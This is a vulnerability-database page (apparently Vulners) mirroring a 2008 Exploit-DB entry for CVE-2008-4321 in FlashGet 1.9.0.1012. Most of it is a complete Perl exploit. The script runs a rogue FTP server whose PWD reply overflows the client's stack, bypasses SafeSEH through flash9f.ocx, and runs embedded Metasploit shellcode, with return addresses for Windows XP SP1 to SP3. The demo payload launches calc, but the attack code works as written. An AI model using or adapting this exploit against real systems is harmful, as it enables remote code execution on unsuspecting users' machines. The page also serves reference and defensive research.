Lucene search
+L

FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)

🗓️ 17 Aug 2008 00:00:00Reported by Guido LandiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 45 Views

FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH) bypass using flash9f.oc

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-4321
13 Aug 200800:00
circl
checkpoint_advisories
Check Point Advisories
FlashGet FTP PWD Command Stack Buffer Overflow (CVE-2008-4321)
11 Oct 200900:00
checkpoint_advisories
cve
CVE
CVE-2008-4321
29 Sep 200819:00
cve
cvelist
Cvelist
CVE-2008-4321
29 Sep 200819:00
cvelist
exploitdb
Exploit DB
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)
13 Aug 200800:00
exploitdb
exploitdb
Exploit DB
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow
15 Aug 200800:00
exploitdb
nvd
NVD
CVE-2008-4321
29 Sep 200819:25
nvd
openvas
OpenVAS
FlashGet FTP PWD Response Remote Buffer Overflow Vulnerability
22 Aug 200800:00
openvas
openvas
OpenVAS
FlashGet FTP PWD Response Remote Buffer Overflow Vulnerability
22 Aug 200800:00
openvas
prion
Prion
Buffer overflow
29 Sep 200819:25
prion
Rows per page
#!/usr/bin/perl
# k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx.

use warnings;
use strict;
use IO::Socket;

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";

my @targets = ( "\x82\x01\x02\x30", "\x82\x01\x02\x30", "\x0b\x02\x01\x30" );

if( !defined($ARGV[0]) or $ARGV[0] !~ /^(1|2|3)$/ )
{
	usage();
}

$ARGV[0]--;

my $sock = IO::Socket::INET->new(
					LocalAddr => '0.0.0.0',
					LocalPort => '21',
					Listen => 1,
					Reuse => 1
					) || die($!);

while(my $csock = $sock->accept())
{

	print $csock "220 Hello ;)\r\n";
	read_sock($csock);

	print $csock "331 pwd please\r\n";
	read_sock($csock);

	print $csock "230 OK\r\n";
	read_sock($csock);

	print $csock "250 CWD command successful.\r\n";
	read_sock($csock);

	print $csock	"257 " . "\x22"	.
			"\x41" x 324 .

			"\xEB\x06\x90\x90" . # jump ahead
			$targets[$ARGV[0]] . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH  ;)

			$shellcode .

			"\x90" x 840 .
			"\x22" .
			" is current directory.\r\n";

	close($csock);
	exit;
}



sub read_sock
{
	my ($sock) = @_;

	my $buf = <$sock>;

	print "[client] -> $buf";

}

sub usage
{
	print "usage: $0 [1,2,3]
  1 -> Windows XP SP1
  2 -> Windows XP SP2
  3 -> Windows XP SP3\n";
	exit;
}

# milw0rm.com [2008-08-17]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05737
45